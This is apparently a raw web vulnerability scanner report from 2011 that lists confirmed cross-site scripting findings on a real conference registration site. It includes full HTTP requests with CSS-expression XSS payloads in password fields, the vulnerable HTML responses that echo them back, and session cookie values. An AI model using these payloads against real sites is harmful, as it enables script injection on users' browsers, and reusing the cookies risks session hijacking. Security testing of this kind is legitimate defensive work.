class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=4a719e56ed2d4b1cbe6c40e7a86132f1
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=qu33j36nav1snj3p553ht52sb3
Content-Length: 1820
Accept-Encoding: gzip, deflate

--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="action"

preload_category
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="eventid"

19301
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="categoryid"

-1
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="language"

eng
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="reference"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="eb"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="admin"

-1
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="bridgeid"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="discountcode"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="catpassword[65419]"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="catpassword[65420]"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="catpassword[65413]"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="catpassword[65411]"

" stYle="x:expre/**/ssion(netsparker(9))
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="catpassword[65421]"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="selectcategoryid"

65407
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="catpassword[65407]"

3
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="x"

0
--4a719e56ed2d4b1cbe6c40e7a86132f1
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--4a719e56ed2d4b1cbe6c40e7a86132f1--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:27:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST " stYle="x:expre/**/ssion(alert(9))
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=e7c07f8fd4034229891b1c36726fbaf9
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=g0ar4kfkmfh5jj22kdili1dk92
Content-Length: 1820
Accept-Encoding: gzip, deflate

--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="action"

preload_category
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="eventid"

19301
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="categoryid"

-1
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="language"

eng
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="reference"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="eb"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="admin"

-1
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="bridgeid"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="discountcode"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="catpassword[65419]"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="catpassword[65420]"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="catpassword[65413]"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="catpassword[65411]"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="catpassword[65421]"

" stYle="x:expre/**/ssion(netsparker(9))
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="selectcategoryid"

65407
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="catpassword[65407]"

3
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="x"

0
--e7c07f8fd4034229891b1c36726fbaf9
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--e7c07f8fd4034229891b1c36726fbaf9--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:28:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br 